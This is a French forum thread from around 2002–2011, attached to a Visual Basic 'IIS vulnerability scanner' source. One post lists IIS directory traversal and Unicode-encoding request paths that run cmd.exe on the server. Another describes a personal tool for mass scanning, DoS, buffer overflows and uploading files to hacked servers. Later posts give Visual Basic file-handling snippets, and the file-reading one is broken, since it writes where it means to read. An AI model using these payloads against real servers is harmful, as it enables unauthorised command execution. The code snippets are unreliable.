Sujet Précédent Sujet Suivant

SCANNEUR DE FAILLES IIS

cs_Mercury Messages postés 329 Date d'inscription jeudi 3 janvier 2002 Statut Membre Dernière intervention 7 octobre 2005 - 22 juil. 2002 à 09:48
78zerocool Messages postés 22 Date d'inscription jeudi 13 janvier 2011 Statut Membre Dernière intervention 20 juillet 2011 - 28 juil. 2011 à 01:32

Cette discussion concerne un article du site. Pour la consulter dans son contexte d'origine, cliquez sur le lien ci-dessous.

https://codes-sources.commentcamarche.net/source/565-scanneur-de-failles-iis

78zerocool Messages postés 22 Date d'inscription jeudi 13 janvier 2011 Statut Membre Dernière intervention 20 juillet 2011
28 juil. 2011 à 01:32

de meme enregistrement de ta textBox dans un fichier txt

Sub cmdSave_Click()
Dim Temp as string ' declaration du contenue du text
Temp = Text1.Text ' attribution de la valeur du text
Dim Filename as string
Filename = InputBox("Entrez un nom de fichier :",Me.Caption)
Open App.Path & Filename & ".txt" For Output as #1 ' Ouverture
Print#1 , Temp ' Ecriture sans le string
Close#1 ' fermeture
MsgBox "Fichier enregistré avec succes !", _
vbinformation ,Me.Caption
End Sub

78zerocool Messages postés 22 Date d'inscription jeudi 13 janvier 2011 Statut Membre Dernière intervention 20 juillet 2011
28 juil. 2011 à 01:25

1/Comment je peux faire pour afficher tout le contenu d'un fichier texte dans une textbox ?

tu mais un boutton et tu le nomme cmdOpen
On dit que ta textbox de destination se nomme Text1

apres tu mais ton fichier .txt a la racine de ton prog et dans le boutton tu mets :

Sub cmdOpen_Click()
Dim Temp as string ' declaration du contenue du text
Open App.Path & "\Montxt.txt" For Input as #1 ' Ouverture
Print#1 , Temp ' Ecriture sans le string
Close#1 ' fermeture
Text1.Text = Temp ' attribution de la valeur du text
End Sub

cs_Cerbere Messages postés 6 Date d'inscription dimanche 1 décembre 2002 Statut Membre Dernière intervention 1 décembre 2002
1 déc. 2002 à 18:26

Il faut tout de même avouer que ce code est d'une lenteur insupportable. Je pense qu'il faudrait plutôt utiliser des sockets et réccupérer uniquement les éléments de l'head nécessaire pour faire tourner l'appli, de plus je pense qu'il n'ai pas necessaire de continuer de faire tourner l'appli une fois que l'on a trouvé une faille, c'est une perte de temps (a moins d'être collectionneur de failles IIS ...). Enfin, je pense qu'il faudrait aller plus loin dans l'appli et automatiser les procédures, comme la génération de rep et de creation de fichier afin d'uploader, tout ça sous forme de fichier texte que l'on pourrait personnaliser a sa guise. Bon si je vous dit ça c'est que j'en ai fais un petit programme en Delphi qui fonctionne très bien et c'est pratique pour faire des PubStros, D.o.S, mass scan ou encore des bufferoverflows. Je pense qu'en VB ce doit être faisable, donc je vais m'y mettre dès que j'aurais un peu, je vous tiendrais au courrant des évolutions.

Pour terminer, je voulais juste vous informer que le ministre de la sécurité des US est en train de redefinir les lois concernant tout le secteur informatique. A vrai dire jusque là tout va bien ... mise a part les peines qui sont complètements absurdes !

( Extrait : le CSEA (Cyber Security Enhancement Act), a été rajouté en dernière minute au Homeland Security bill. Il étend les pouvoirs de la police en lui permettant d'effectuer des écoutes téléphoniques ou sur le net sans mandat. L'autre point clé concerne les fournisseurs d'accès internet, qui pourront avec plus de latitude communiquer à la police des informations concernant leurs abonnés. Enfin, les hackers ayant agi délibérément pour nuire seront passibles de peine de prison à vie.)

Pour conclure une p'tite phrase de BuSh :
«Une souris peut être aussi dangereuse qu'une balle ou une bombe»

Tout ça pour dire que faudra a un moment donné réduire l'utilisation de nos p'tits scanner iis, sql, netbios, ipc, etc ... snif !

Skywalker13 Messages postés 111 Date d'inscription dimanche 6 janvier 2002 Statut Membre Dernière intervention 27 août 2004
22 juil. 2002 à 17:39

qques une ...

/scripts/root.exe?/c+dir
/MSADC/root.exe?/c+dir
/c/winnt/system32/cmd.exe?/c+dir
/d/winnt/system32/cmd.exe?/c+dir
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir

Zepetitlutin Messages postés 22 Date d'inscription dimanche 14 juillet 2002 Statut Membre Dernière intervention 14 mai 2004
22 juil. 2002 à 14:46

Tout à fait vrai, je vais de suite réparer ceci... Néanmoins je ne comptais pas m'attribuer le mérite de cette source...

cs_Imax Messages postés 8 Date d'inscription samedi 8 juin 2002 Statut Membre Dernière intervention 8 juin 2002
22 juil. 2002 à 11:27

Je confirme également, source identique dans dans Hacherz Voice n°10 (tutoriel sur un scanner de failles IIS). T'aurais pu citer la source ...

cs_Mercury Messages postés 329 Date d'inscription jeudi 3 janvier 2002 Statut Membre Dernière intervention 7 octobre 2005
22 juil. 2002 à 09:48

Source réalisée par le journal Harckerz Voice du mois de juin.

Discussions similaires

Problème avec IIS

erreur 500 non detaillé

IIS instalaltion fraiche, et erreur 500

recuperer le repertoire virtuel d'IIS en C#

HTTP 500.100 - Erreur interne au serveur - Erreur ASP

Votre réponse

Discussions similaires